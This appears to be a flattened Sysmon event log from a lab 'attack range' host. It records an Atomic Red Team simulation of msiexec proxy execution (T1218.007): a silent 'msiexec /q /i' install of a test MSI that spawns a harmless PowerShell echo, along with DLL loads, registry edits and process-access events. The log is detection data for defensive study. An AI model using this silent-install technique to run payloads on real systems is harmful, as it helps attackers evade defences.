"C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_DLL.msi"C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-9826-62AC-2E6B-000000006202}1828C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_DLL.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002694648Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.131{7CF983DC-9826-62AC-2F6B-000000006202}2520C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{7CF983DC-9826-62AC-2E6B-000000006202}1828C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_DLL.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002694641Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.100{7CF983DC-9826-62AC-2E6B-000000006202}1828C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_DLL.msi""C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{7CF983DC-EEA1-62A8-9500-000000006202}4692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 534500x80000000000000002694626Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.053{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 534500x80000000000000002694625Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.053{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002694624Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteKey2022-06-17 15:05:10.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694623Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:10.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerNT AUTHORITY\SYSTEM 12241200x80000000000000002694622Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:10.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashNT AUTHORITY\SYSTEM 12241200x80000000000000002694621Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:10.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceNT AUTHORITY\SYSTEM 12241200x80000000000000002694620Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694619Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694618Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694617Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694616Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694615Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.037{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 23542300x80000000000000002694614Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.037{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5144.msiMD5=AEA42482EBB78BD94F063AD4ED15E428,SHA256=8561D6CEEDEB83C16F3A23CC62E6CDB924B2157D10880A90E5F211B760BF4988falsetrue 10341000x80000000000000002694237Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.787{7CF983DC-9825-62AC-2B6B-000000006202}38565088C:\Windows\System32\MsiExec.exe{7CF983DC-9825-62AC-2C6B-000000006202}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002694236Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.794{7CF983DC-9825-62AC-2C6B-000000006202}4292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host VBScript executed me!; exitC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\MsiExec.exe -Embedding A90F48C038CE1EB11A957423A237594DWIN-HOST-MHAAG-\Administrator 13241300x80000000000000002694235Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.787{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002694234Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.787{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002694233Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.787{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002694232Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:09.787{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694231Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.787{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694230Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.787{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694229Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.787{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002694228Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.787{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694227Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.787{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1ECtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694226Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.787{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694225Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.787{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\iertutil.dll11.00.14393.5006 (rs1_release.220301-1704)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=153A3C6C45E23363BC842795FD49E7A3,SHA256=06DFA7248890579938106FF7527BB8FD0091A24D1C1667CB6583A4D239885141trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694224Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.787{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\urlmon.dll11.00.14393.5006 (rs1_release.220301-1704)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=72DA72C24A0AD3C49AC956DC083EEDF3,SHA256=2DB817631EC24840FDED7C584BC08F03D3549D93552C8E20005E18BA5E81CA12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694223Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.772{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\edputil.dll10.0.14393.2608 (rs1_release.181024-1742)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=75AC86B00CE4C64B02B105A55CA35628,SHA256=DB31A2345E3BB8DC79BFB4CC29615E3B8B7638AE80BFEC45FA57852669A592AEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002694222Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.772{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManagerWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002694221Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.772{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002694220Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.772{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694215Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\vbscript.dll5.812.10240.16384Microsoft ® VBScriptMicrosoft ® VBScriptMicrosoft Corporationvbscript.dllMD5=B9598FFF335D808F6E4B3B19F0E1E0F3,SHA256=79B0FF39BC2E399748CE6FD8683A7B635B7D245B71F9063C2A93D3100B4F97D6trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694195Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.772{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=087C47C19BBFCB9F4932C03C0189E86B,SHA256=9BEE35FBFA2E595372D82E8858BE46CE7717E0399996960398BC238F4D0E5207trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694193Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.772{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694192Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.772{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\sxs.dll10.0.14393.4169 (rs1_release.210107-1130)Fusion 2.5Microsoft® Windows® Operating SystemMicrosoft CorporationSXS.DLLMD5=54FB18CA661D074CBB60D5A58D40C8D3,SHA256=A2BD6160222A216F8A6830C1273662F8AE88F53D2CE6DA5893FF70D146A0A2B0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694191Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.772{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694190Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.772{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\scrrun.dll5.812.10240.16384Microsoft ® Script RuntimeMicrosoft ® Script RuntimeMicrosoft Corporationscrrun.dllMD5=6E948305B041BE52E45E9E942C78A3F4,SHA256=93C4A201E3627E617C478054BAB472553CF48B84C32DE2F0A316F30F4A61A782trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694189Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\mpr.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Multiple Provider Router DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmpr.dllMD5=0E56DB60C434D51769F2DAC48B9AA686,SHA256=3F9AED98B1B7F6A59C219F622FD91C7FD20BFE280935F5334920A02ECCAE7ED6trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694188Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\wshom.ocx5.812.10240.16384Windows Script Host Runtime LibraryMicrosoft ® Windows Script Host Runtime LibraryMicrosoft Corporationwshom.ocxMD5=012C02BB5DD8EC0FD4AC2688D8D4D0CF,SHA256=B73B3C361F6B07960B092485CE8C96A4E68F741D718C6E847FF37C5BA5227C18trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694187Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694186Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694185Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002694184Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows Script\SettingsWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694183Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694180Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694179Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694178Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}38563944C:\Windows\System32\MsiExec.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\MsiExec.exe+6bca|C:\Windows\System32\MsiExec.exe+7166|C:\Windows\System32\MsiExec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000002694177Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694176Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.756{7CF983DC-9825-62AC-2B6B-000000006202}3856C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 